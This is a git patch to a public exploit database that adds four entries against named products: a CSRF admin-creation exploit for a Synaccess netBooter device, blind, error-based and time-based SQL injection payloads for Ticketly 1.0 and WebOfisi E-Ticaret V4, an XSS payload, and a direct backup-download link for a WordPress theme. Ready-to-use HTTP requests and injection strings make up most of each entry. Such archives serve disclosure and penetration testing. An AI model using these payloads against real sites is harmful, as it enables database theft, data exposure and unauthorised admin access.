From 7967efda8246c3d8e049c5a6428fd3f2b4214a0b Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 22 Nov 2018 05:01:42 +0000 Subject: [PATCH] DB: 2018-11-22 4 changes to exploits/shellcodes macOS 10.13 - 'workq_kernreturn' Denial of Service (PoC) Apple macOS 10.13 - 'workq_kernreturn' Denial of Service (PoC) Synaccess netBooter NP-0801DU 7.4 - Cross-Site Request Forgery (Add Admin) Ticketly 1.0 - 'name' SQL Injection WordPress CherryFramework Themes 3.1.4 - Backup File Download WebOfisi E-Ticaret V4 - 'urun' SQL Injection --- exploits/hardware/webapps/45894.txt | 28 ++++++++++++ exploits/php/webapps/45895.txt | 70 +++++++++++++++++++++++++++++ exploits/php/webapps/45896.txt | 24 ++++++++++ exploits/php/webapps/45897.txt | 44 ++++++++++++++++++ files_exploits.csv | 6 ++- 5 files changed, 171 insertions(+), 1 deletion(-) create mode 100644 exploits/hardware/webapps/45894.txt create mode 100644 exploits/php/webapps/45895.txt create mode 100644 exploits/php/webapps/45896.txt create mode 100644 exploits/php/webapps/45897.txt diff --git a/exploits/hardware/webapps/45894.txt b/exploits/hardware/webapps/45894.txt new file mode 100644 index 000000000..a1a5dcf57 --- /dev/null +++ b/exploits/hardware/webapps/45894.txt @@ -0,0 +1,28 @@ +# Title: Synaccess netBooter NP-0801DU 7.4 - Cross-Site Request Forgery (Add Admin) +# Author: Gjoko 'LiquidWorm' Krstic @zeroscience +# Exploit Date: 2018-11-17 +# Vendor: Synaccess Networks Inc. +# Product web page: https://www.synaccess-net.com +# Affected version: NP-0801DU (HW6.0 BL1.5 FW7.23 WF7.4) +# Tested on: Synaccess server +# CVE: N/A +# Advisory ID: ZSL-2018-5501 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5501.php + +# Desc: The application interface allows users to perform certain +# actions via HTTP requests without performing any validity checks +# to verify the requests. This can be exploited to perform certai +# actions with administrative privileges if a logged-in user visits +# a malicious web site. + + + +
+ + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/45895.txt b/exploits/php/webapps/45895.txt new file mode 100644 index 000000000..6d2662d96 --- /dev/null +++ b/exploits/php/webapps/45895.txt @@ -0,0 +1,70 @@ +# Exploit Title: Ticketly 1.0 – 'name' SQL Injection +# Exploit Author: Javier Olmedo +# Website: https://hackpuntes.com +# Date: 2018-11-19 +# Google Dork: N/A +# Vendor: Abisoft (https://abisoftgt.net) +# Software Link: https://abisoftgt.net/software/6/sistema-de-tickets-y-soporte-con-php-y-mysql +# Affected Version: 1.0 +# Patched Version: unpatched +# Category: Web Application +# Platform: Windows & Ubuntu +# Tested on: Win10x64 & Kali Linux +# 6. References: +# https://hackpuntes.com/cve-2018-18923-ticketly-1-0-multiples-sql-injections/ +# CVE: N/A + +# 1. Technical Description: +# Ticketly 1.0 are affected by SQL Injection in multiple parameters and +# resources through POST. This allows a attacker to read and modify +# sensitive information from the database used by the application. + +# 2. Proof Of Concept (PoC): +# 2.1 The following POST request generates an error 500 in the Application (add ' in name parameter) +--- +POST /ticketly/action/addproject.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0 +Accept: */* +Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Referer: http://localhost/ticketly/projects.php +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 32 +Connection: close + +name=Test%22&description=Test +--- + +# 2.2 In another request, add two ' to receive a code 200 OK +--- +POST /ticketly/action/addproject.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0 +Accept: */* +Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Referer: http://localhost/ticketly/projects.php +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 32 +Connection: close + +name=Test%22%22&description=Test +--- + +# 3. Payloads +# 3.1 Payload (boolean-based blind) +name=Test" RLIKE (SELECT (CASE WHEN (4632=4632) THEN 0x54657374 ELSE 0x28 END)) AND "lrmZ"="lrmZ&description=Test + +# 3.2 Payload (error-based) +name=Test” AND EXTRACTVALUE(9139,CONCAT(0x5c,0x7176766a71,(SELECT (ELT(9139=9139,1))),0x7178717a71)) AND "SZJL"="SZJL&description=Test + +#3.3 Payload (AND/OR time-based blind) +name=Test” RLIKE SLEEP(5) AND "WkTS"="WkTS&description=Test + +# 4. Vulnerables resources and parameters +# /action/addproject.php (description, name, category_id and description) +# /action/addticket.php (king_id, priority_id, project_id, status_id and title) +# /reports.php (kind_id y status_id) \ No newline at end of file diff --git a/exploits/php/webapps/45896.txt b/exploits/php/webapps/45896.txt new file mode 100644 index 000000000..2b54c5318 --- /dev/null +++ b/exploits/php/webapps/45896.txt @@ -0,0 +1,24 @@ +# Exploit Title: Wordpress CherryFramework Themes 3.1.4 - Backup File Download +# Google Dork: inurl:/wp-content/themes/CherryFramework +# Date: 2018-11-17 +# Exploit Author: b1p0l4r +# Vendor Homepage: http://www.cherryframework.com/ +# Software Link: http://www.cherryframework.com/ +# Version: 3.x.x > 3.1.4 +# Tested on: Ubuntu 18.0.4.1 +# CVE : N/A + +# The CherryFramework Cherry theme 3.1.4 for WordPress allow +# remote attackers to +# obtain potentially sensitive information via +# wp-content/themes/CherryFramework/admin/data_management/ download_backup.php +# because it +# offers the option of a ZIP archive containing the entire content of the wp-content/themes directory. + +# [PoC] +# just open that files/link and then showing the popup for saving a .ZIP file +# EXAMPLE LINK = + +https://www.victim.com/wp-content/themes/CherryFramework/admin/data_management/download_backup.php + +# IndoXploit, ZeroByte.ID, Eldersc0de Family, Exploiter Xero Team \ No newline at end of file diff --git a/exploits/php/webapps/45897.txt b/exploits/php/webapps/45897.txt new file mode 100644 index 000000000..82c5e0548 --- /dev/null +++ b/exploits/php/webapps/45897.txt @@ -0,0 +1,44 @@ +# Exploit Title: WebOfisi E-Ticaret V4 - 'urun' SQL Injection +# Date: 2018-11-21 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Contact: https://pentest.com.tr +# Vendor Homepage: https://www.web-ofisi.com +# Software Demo: http://demobul.net/eticaretv4/ +# Software Link: https://drive.google.com/file/d/1ZghFSsYto-Vpv3PXunx8xm2g-Gs3HJwz/view?usp=sharing +# Version: v4.0 +# Category: Webapps +# Tested on: XAMPP for Linux +# Description: E-Ticaret v4 is a professional online shopping script with many features. +# Vulnerabilities have been discovered during penetration testing. + +# PoC : SQLi : +# Request : /eticaretv4/arama.html?kategori=20&urun=test + +# Parameter : urun (GET) +# Type : boolean-based blind +# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause +# Payload: + +kategori=20&urun=test") RLIKE (SELECT (CASE WHEN (6525=6525)THEN 0x74656474 ELSE 0x28 END)) AND ("YWLa"="YWLa + +# Type: error-based +# Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +# Payload: + +kategori=20&urun=test") OR (SELECT 6556 FROM(SELECT COUNT(*),CONCAT(0x71626b6b71,(SELECT(ELT(6556=6556,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("ExaV"="ExaV + +# Type: stacked queries +# Title: MySQL < 5.0.12 stacked queries (heavy query) +# Payload: + +kategori=20&urun=test");SELECT BENCHMARK(5000000,MD5(0x44527964)) AND ("KGaO"="KGaO + +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 OR time-based blind +# Payload: + +kategori=20&urun=test") OR SLEEP(5) AND ("sDnb"="sDnb + +# PoC : XSS : +# Payload : +http://demobul.net/eticaretv4/arama.html?kategori=20&urun=%3E%27%3E%22%3E%3Cimg%20src=x%20onerror=alert%280%29%3E \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 27ac7af8f..a1d4d608a 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6194,7 +6194,7 @@ id,file,description,date,author,type,platform,port 45885,exploits/windows_x86-64/dos/45885.txt,"Easy Outlook Express Recovery 2.0 - Denial of Service (PoC)",2018-11-16,"Ihsan Sencan",dos,windows_x86-64, 45887,exploits/windows/dos/45887.py,"XMPlay 3.8.3 - '.m3u' Denial of Service (PoC)",2018-11-19,s7acktrac3,dos,windows, 45889,exploits/windows/dos/45889.js,"Microsoft Edge Chakra - OP_Memset Type Confusion",2018-11-19,"Google Security Research",dos,windows, -45891,exploits/macos/dos/45891.c,"macOS 10.13 - 'workq_kernreturn' Denial of Service (PoC)",2018-11-20,"Fabiano Anemone",dos,macos, +45891,exploits/macos/dos/45891.c,"Apple macOS 10.13 - 'workq_kernreturn' Denial of Service (PoC)",2018-11-20,"Fabiano Anemone",dos,macos, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -40396,3 +40396,7 @@ id,file,description,date,author,type,platform,port 45882,exploits/php/webapps/45882.txt,"Helpdezk 1.1.1 - Arbitrary File Upload",2018-11-16,"Ihsan Sencan",webapps,php,80 45883,exploits/php/webapps/45883.txt,"DomainMOD 4.11.01 - Cross-Site Scripting",2018-11-16,"Dawood Ansar",webapps,php,80 45892,exploits/php/webapps/45892.txt,"Ticketly 1.0 - Cross-Site Request Forgery (Add Admin)",2018-11-20,"Javier Olmedo",webapps,php,80 +45894,exploits/hardware/webapps/45894.txt,"Synaccess netBooter NP-0801DU 7.4 - Cross-Site Request Forgery (Add Admin)",2018-11-21,LiquidWorm,webapps,hardware, +45895,exploits/php/webapps/45895.txt,"Ticketly 1.0 - 'name' SQL Injection",2018-11-21,"Javier Olmedo",webapps,php,80 +45896,exploits/php/webapps/45896.txt,"WordPress CherryFramework Themes 3.1.4 - Backup File Download",2018-11-21,b1p0l4r,webapps,php,80 +45897,exploits/php/webapps/45897.txt,"WebOfisi E-Ticaret V4 - 'urun' SQL Injection",2018-11-21,AkkuS,webapps,php,80